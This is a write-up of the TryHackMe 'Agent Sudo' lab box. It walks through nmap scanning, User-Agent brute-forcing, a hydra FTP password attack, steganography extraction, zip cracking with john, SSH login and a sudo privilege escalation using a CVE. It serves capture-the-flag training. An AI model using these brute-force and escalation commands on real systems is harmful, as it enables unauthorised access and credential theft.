Agent Sudo CTF — TryHackMe Writup

A secret server is located under the deep sea; hack and reveal the truth.

You found a secret server located deep under the sea. Your mission? Hack inside the server and reveal the hidden truth. This walkthrough will guide you through the process step-by-step, from enumeration to privilege escalation.

0. Enumeration

Target IP: 10.10.165.175

To start, I ran an Nmap scan on the target, revealing three open ports:

nmap 10.10.165.175 -v

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Homepage Clue

Visiting http://10.10.165.175/ revealed the following message:

Dear agents,

Use your own codename as user-agent to access the site.

From,
Agent R

The codename likely refers to a user-agent string, possibly one of the alphabet (Agent A to Z). To test this hypothesis, I used Burp Suite's Intruder to brute-force user-agent strings.

Using Burp Suite

I have inserted payload in user-agent from A to Z, and forwarded through intruder.

Intruder in BurpSuite

Response length for C and R are different, for C less and for R more. By analyzing I found R have much content as

What are you doing! Are you one of the 25 employees? If not, I going to report this incident
 
Dear agents,
Use your own <b>codename</b> as user-agent to access the site.

From,
Agent R

But in case of C, there is status code `302` and the location is `Location: agent_C_attention.php`

Response for user-agent: C

Now visit the location we found,

Attention chris,

Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!

From,
Agent R

The agent name is `chris` and it says the password is weak.

1. Attacking

Lets try out password crack for user cheris in FTP. We will use hydra for attack and rockyou.txt for password list.

FTP Login

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.165.175 ftp

FTP password attack

After the successful login to FTP, we got

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
-rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
-rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png
226 Directory send OK.

All the files are download by simply `get` command.

The message says that the password is stored inside the image. So need to apply the concept to steganography.

❯ cat To_agentJ.txt
Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.

From,
Agent C

Steganography

Now, using `binwalk` and getting info if found.

❯ binwalk cute-alien.jpg

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01

❯ binwalk cutie.png

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
869           0x365           Zlib compressed data, best compression
34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820         0x8804          End of Zip archive, footer length: 22

Now extracting the cutie.png using `binwalk -e cutie.png` we have 365, 365.zlib and 8702.zip files, zip is important and is password protected.

I used John the Ripper to crack the zip’s password. First creating hash by and then cracking the hash as

❯ zip2john 8702.zip > zip_pass.hash

❯ john --wordlist=/usr/share/wordlists/rockyou.txt zip_pass.hash
.............
Press 'q' or Ctrl-C to abort, almost any other key for status
ali**            (8702.zip/To_agentR.txt)
1g 0:00:00:00 DONE (2024-10-08 17:45) 1.162g/s 28576p/s 28576c/s 28576C/s christal..280789
Session completed

Now we have zip password, extract it. Was a message:

Agent C,

We need to send the picture to 'QXJlYTUx' as soon as possible!

By,
Agent R

Here `QXJlYTUx` is encoded, lets decode using base64 as

echo 'QXJlYTUx' | base64 -d
Area**

Now look into cute-alien.jpg, using `steghide`. After the command `steghide — info cute-alien.jpg`, we found that the `message.txt` file is embedded there.

Finally, using steghide, I extracted the hidden message from cute-alien.jpg:

steghide --extract -sf cute-alien.jpg

❯ cat message.txt
Hi jam**,

Glad you find this message. Your login password is hacker******

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,
chris

2. Capture the Flag

I used the credentials to SSH into the server:

ssh jam**@10.10.165.175

After logging in, I captured the user flag.

Capturing user flag

To know the incident of the photo `Alien_autospy.jpg` we need to download (maybe using scp) and search on google as

scp jam**@10.10.165.175:/home/jam**/Alien_autospy.jpg .

By searching we found the image from `Roswell`

3. Privilege Escalation

Running sudo -l revealed that the user could run /bin/bash as sudo.

The sudo version (1.8.21p2) was vulnerable to CVE-2019-14***. Using an exploit from Exploit-DB, I escalated privileges to root:

sudo ***** /bin/bash

After successfully gaining root access, I retrieved the root flag.

Capturing root flag

Final message from Agent R is

To Mr.hacker,

Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine. 

By,
Des*** a.k.a Agent R

This was a fun and insightful challenge that covered enumeration, brute-forcing, steganography, and privilege escalation.

Happy hackers! Happy Hacking!!